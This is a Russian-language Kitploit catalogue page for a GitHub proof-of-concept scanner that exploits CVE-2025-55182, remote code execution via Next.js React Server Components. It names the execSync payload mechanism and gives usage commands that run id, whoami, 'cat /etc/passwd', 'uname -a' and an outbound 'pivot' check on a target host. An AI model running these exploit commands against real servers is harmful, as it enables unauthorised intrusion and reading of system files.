Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC-CVE-2025-55182 — POC-CVE-2025-55182 | Kitploit
Инструменты/GitHubGitHub/devvaibhav07/poc-cve-2025-55182
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubdevvaibhav07/poc-cve-2025-55182

POC-CVE-2025-55182

POC-CVE-2025-55182

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 Advanced Scanner

Полнофункциональная утилита для эксплуатации CVE-2025-55182 — удаленное выполнение кода через React Server Components в Next.js. Сканер автоматически создает multipart-полезную нагрузку и использует process.mainModule.require('child_process').execSync() для выполнения произвольных команд ОС на уязвимых экземплярах.

Возможности

  • Автоматический генератор полезной нагрузки — ручное кодирование не требуется
  • Выполнение команд с чистой выборкой STDOUT
  • Автоматическое определение протокола (https:// добавляется при отсутствии)
  • Корректное декодирование URL + восстановление новых строк
  • Цветной насыщенный вывод для быстрой обратной связи оператора
  • Идентификация ошибок (500 / 403 / SSL / таймаут / шаблоны WAF)

Установка

root@kitploit:~
chmod +x scanner.sh

Использование

root@kitploit:~
# Стандартное сканирование (выполняет 'id')
./scanner.sh -d vulnerable-app.com

# Выполнение пользовательской команды
./scanner.sh -d vulnerable-app.com -c "whoami"

# С явным протоколом
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"

Опции

Скриншот 2025-12-09 at 16 13 23

Примеры

root@kitploit:~
# Проверка RCE
./scanner.sh -d shop.example.com

# Определение системы
./scanner.sh -d shop.example.com -c "uname -a"

# Перечисление доступных для записи путей
./scanner.sh -d shop.example.com -c "ls -la /var/www"

# Вспомогательный pivot — проверка исходящего доступа
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"

Не стесняйтесь обращаться по адресу mailto:[email protected]

Скачать инструмент